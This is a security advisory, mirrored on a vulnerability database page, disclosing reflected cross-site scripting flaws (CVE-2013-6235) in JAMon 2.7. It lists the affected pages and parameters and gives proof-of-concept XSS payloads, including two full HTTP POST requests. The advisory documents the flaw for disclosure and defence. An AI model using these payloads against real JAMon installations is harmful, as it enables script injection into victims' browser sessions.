Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:30281
HistoryFeb 03, 2014 - 12:00 a.m.

[CVE-2013-6235] - Multiple Reflected XSS vulnerabilities in JAMon v2.7

2014-02-0300:00:00
vulners.com
33
JSON

###################################################

  1. Advisory Information

Title: Multiple Reflected XSS vulnerabilities in JAMon
Date published: 2013-01-23
Date of last update: 2013-01-23
Vendors contacted: JAMon v 2.7
Discovered by: Christian Catalano
Severity: Low

  1. Vulnerability Information

CVE reference: CVE-2013-6235
CVSS v2 Base Score: 4.3
CVSS v2 Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Component/s: JAMon v 2.7
Class: Input Manipulation

  1. Introduction

The Java Application Monitor (JAMon) is a free, simple, high performance, thread safe, Java API that allows developers to easily monitor production applications.

http://jamonapi.sourceforge.net

  1. Vulnerability Description

Multiple Non-Persistent Cross-Site Scripting vulnerabilities have been identified in the JAMon web application.
JAMon contains a flaw that allows multiple reflected cross-site scripting (XSS) attacks.
This flaw exists because certain pages do not validate input before returning it to users.

±-----------------------------±------------------+
|-Vulnerable module(s)--------and----parameter(s)–|
±-----------------------------±------------------+
|mondetail.jsp --------------------ArraySQL--------|
|mondetail.jsp --------------------listenertype----|
|mondetail.jsp --------------------currentlistener-|
|jamonadmin.jsp -------------------ArraySQL--------|
|sql.jsp---------------------------ArraySQL--------|
|exceptions.jsp--------------------ArraySQL--------|
±-----------------------------±------------------+

  1. Technical Description / Proof of Concept Code

05.01) Malicious Request ("ArraySQL" parameter):

The vulnerability is located in the ' Filter (optional) ' input field upon submission to the pages

http://localhost/jamon/mondetail.jsp
http://localhost/jamon/ jamonadmin.jsp
http://localhost/jamon/ sql.jsp
http://localhost/jamon/ exceptions.jsp

The application does not validate the 'ArraySQL' parameter upon submission to the *.jsp scripts.
The attacker can inject the malicious javascript code:

1–>1<ScRiPt >alert('XSS')</ScRiPt><!–

in the ' Filter (optional) ' input field and click on GO! button.

05.02) Malicious Request ("listenertype " parameter)

POST /jamon/mondetail.jsp HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/jamon/mondetail.jsp
Cookie: JSESSIONID=3EFF8AFB46683B03B2CD73663A97FFDD.jboss1; ROUTEID=.jboss1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 209

listenertype=1–>1<ScRiPt>alert('XSS')</ScRiPt><!–&currentlistener=JAMonBufferListener&outputTypeValue=html&formatterValue=%23%2C%23%23%23&bufferSize=No+Action&TextSize=&highlight=&ArraySQL=&actionSbmt=Go+%21

05.03) Malicious Request ("currentlistener " parameter)

POST /jamon/mondetail.jsp HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/jamon/mondetail.jsp
Cookie: JSESSIONID=3EFF8AFB46683B03B2CD73663A97FFDD.jboss1; ROUTEID=.jboss1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 195

listenertype=value&currentlistener=1–>1<ScRiPt>alert('XSS')</ScRiPt><!–&outputTypeValue=html&formatterValue=%23%2C%23%23%23&bufferSize=No+Action&TextSize=&highlight=&ArraySQL=&actionSbmt=Go+%21

  1. Business Impact

This may allow an attacker to create a specially crafted request that would execute arbitrary script code in a user's browser within the trust relationship between their browser and the server.

  1. Systems Affected

This vulnerability was tested against: JAMon v2.7
Older versions are probably affected too, but they were not checked.

  1. Vendor Information, Solutions and Workarounds

Currently, there are no known upgrades or patches to correct this vulnerability.

  1. Credits

This vulnerability has been discovered by:
Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com

  1. Vulnerability History

October 18th, 2013: Vulnerability identification
October 22th, 2013: Vendor notification [JAMon]
December 10th, 2013: Vulnerability confirmation [JAMonI]
January 23th, 2014: Vulnerability disclosure

  1. Disclaimer

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of
this information.

###################################################

Related

packetstorm 1
github 1
osv 1
debiancve 1
cve 1
prion 1
ubuntucve 1
openvas 1
securityvulns 1
packetstorm
packetstorm
JAMon 2.7 Cross Site Scripting
2014-01-24 00:00:00
github
github
Improper Neutralization of Input During Web Page Generation in JAMon
2022-05-14 02:54:05
osv
osv
Improper Neutralization of Input During Web Page Generation in JAMon
2022-05-14 02:54:05
debiancve
debiancve
CVE-2013-6235
2014-01-31 15:07:00
cve
cve
CVE-2013-6235
2014-01-31 15:07:00
prion
prion
Cross site scripting
2014-01-31 15:07:00
ubuntucve
ubuntucve
CVE-2013-6235
2014-01-31 00:00:00
openvas
openvas
JAMon Multiple Cross-Site Scripting Vulnerabilities
2014-02-10 00:00:00
securityvulns
securityvulns
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2014-02-03 00:00:00
JSON
Related for SECURITYVULNS:DOC:30281
packetstorm1github1osv1debiancve1cve1prion1ubuntucve1openvas1securityvulns1